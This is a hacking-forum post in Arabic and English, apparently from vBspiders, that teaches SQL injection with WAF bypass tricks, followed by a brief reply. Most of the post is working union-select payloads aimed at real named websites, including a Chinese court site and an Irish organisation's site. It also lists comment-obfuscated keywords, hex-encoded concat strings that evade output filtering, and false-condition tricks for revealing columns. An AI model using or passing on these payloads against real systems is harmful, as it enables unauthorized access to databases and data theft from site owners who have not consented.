sql Injection Professional & many WAF Bypassing TRK

[CODE3]

بعض المشاكل في الحقن وكيف تخطيها

:: like ::

كود PHP:

http://fzszy.chinacourt.org/public/detail.php?id=-168' union /*!%53elect*/ version() --+ 


open source page : press Ctrl+f and typ 5.0

and to avoid Source Code Injection and appear info inside img in mean page

use

اقتباس concat(0x223e3c62723e,version(),0x3c696d67207372633d22)

or

اقتباس concat(0x273e27,version(),0x3c212d2d)

كود PHP:

http://fzszy.chinacourt.org/public/detail.php?id=-168' union /*!%53elect*/ concat(0x223e3c2f613e3c2f74643e,version(),0x3c6120687265663d22)--+ 


aircrack -ng معجب بهذا

المصدر: :: vBspiders Professional Network ::

---

sql Injection Professional & many WAF Bypassing TRK

[CODE3]

(2)

كود PHP:

jumble.dibbaa.com/article.php?id=7' union select 1,2,3,4,5,6,7,8 +--+ 


\

no column appear in page i will use div+0 i will put it befor union select

or use one of this

اقتباس div+0 Having+1=0 AND+1=0 /*!and*/+1=0 and(1)=(0) x OR false the url query id=-1 union all select id=null union all select id=1+and+false+union+all+select id=9999 union all select

كود PHP:

jumble.dibbaa.com/article.php?id=7' div 0 union select 1,2,3,4,5,6,7,8 +--+ 


[CODE3]

كود PHP:

http://www.phm.ie/project.php?cat=Conservation 


u can use many method to bypassing Forbidden

like

+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/

كود PHP:

http://www.phm.ie/project.php?cat=Conservation' +and(1)=(0) +union+distinct+select+ 1,version(),3,4,5,6,7,8,9,10-- - 


and use and 1=0 to apear column nmb in the page

or

+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)

[ABO-SAGER]

شكراً لك بس انا وضعت شرح كيف تتخطى الحقن في السورس